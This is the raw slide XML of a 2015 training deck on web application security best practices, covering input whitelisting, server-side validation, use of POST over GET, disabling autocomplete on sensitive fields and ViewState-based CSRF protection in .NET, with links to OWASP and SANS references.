TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://asafaweb.com/OWASP%20Top%2010%20for%20.NET%20developers.pdf" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tinfoilsecurity.com/blog/protect-your-website-from-embedded-content-iframe-security"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www.sans.org/top25-software-errors/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.paterva.com/web6/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.networkworld.com/article/2686393/malicious-advertisements-distributed-by-doubleclick-zedo-networks.html?source=NWWNLE_nlt_security_2014-09-22#tk.rss_security" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.exploit-db.com/google-dorks/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/List_of_useful_HTTP_headers" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://bsimm.com/download/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/images/5/58/OWASP_ASVS_Version_2.pdf" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.securecoding.cert.org/confluence/display/jg/Java+Coding+Guidelines" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/hh882339(v=vs.100).aspx" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sans.org/reading-room/categorie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Web Application Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Best Practices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Steve Holton, Office of Information Security and Privacy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>“I’m in the book”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Copyright </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>© </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>2015 Office of Information Security and Privacy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Revision: 20150729</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3509192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#1 (cont’d)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>BEST input sanitization is a via WHITE LIST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Look for specific legal entries. Everything not contained in the white list is rejected.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Practical only for fields with a limited number of “correct” entries</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="192827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#1 (cont’d)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If you can’t white list (too many values possible):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Verify numeric fields ARE all numeric</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Range check numbers where appropriate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Verify the lengths of all fields for correctness (avoid “buffer overflows”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Text fields should only contain “regular” text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3526802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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sanitization/validation **MUST ALWAYS** be performed on the server  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Even </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>if pre-validated on client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>e.g.,JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Even </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>if the field is a radio button or “drop down” list </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>item</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Even </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>if the data is a “hidden field” that you placed in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Even </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>if using parameterized SQL queries (including stored procedures) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>– no XSS code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>placed into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>database, please!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2058914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#2 (cont’d)</a:t>
            </a:r>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00" y="1143000"/>
            <a:ext cx="8593137"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2810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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>2 (cont’d)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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47800"/>
            <a:ext cx="567690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450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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sanitize “client side” for performance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>YOU MUST STILL SANITIZE SERVER SIDE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Because client-side can be bypassed in several ways</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>But adding client-side is desirable for performance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Invalid data doesn’t have to make a “round trip” through the network to the server and back</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server cycles are not wasted on processing obviously incorrect data – no network/disk I/O and associated interrupts, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“Instant” user feedback – no network delays</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2147280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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>#4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Leverage platform validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Learn what’s available AND how it works</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML5 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ASP.NET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Java</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Other platforms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ESAPI (OWASP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4054394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Safety</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Avoid accidental exposure of  information</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1042439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Safety </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rule </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>#1 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(A4,A1,A6,A2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use POST, –not– GET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>GET exposes data in “plain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>sight”, WHICH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NOT ENCRYPTED</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Plain-text GET parameters are included in things like:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Referrer headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser history</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Especially problematic for sensitive data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1690130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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rule </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>#2 (A6)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1752600"/>
            <a:ext cx="8458200" cy="4419600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Do not use autocomplete</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“autocomplete=off” for any fields that contain sensitive information – credit card numbers, SS numbers, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some users don’t have a dedicated PC, but use a “shared” PC.  And PCs can be stolen. Don’t provide any extra assistance to hackers by caching this sensitive info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>NO GUARANTEE – some password managers will still save passwords, some browsers may ignore </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2132294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Face of Attacks - 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“Old School”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bragging rights</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mostly “annoyance”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Deface pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Re-direct to other sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Some “nasty” attacks were (D)dos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Some cost to web sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Damage containable (mostly)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3742579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#3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use encrypted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ViewState</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  (.NET) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>web.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ViewState</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for protection against CSRF attacks you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>also need </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to set the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ViewStateUserKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>protected override </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OnInit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>EventArgs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> e) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>base.OnInit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(e); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ViewStateUserKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Session.SessionID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2366515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#4 (A2,A6)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
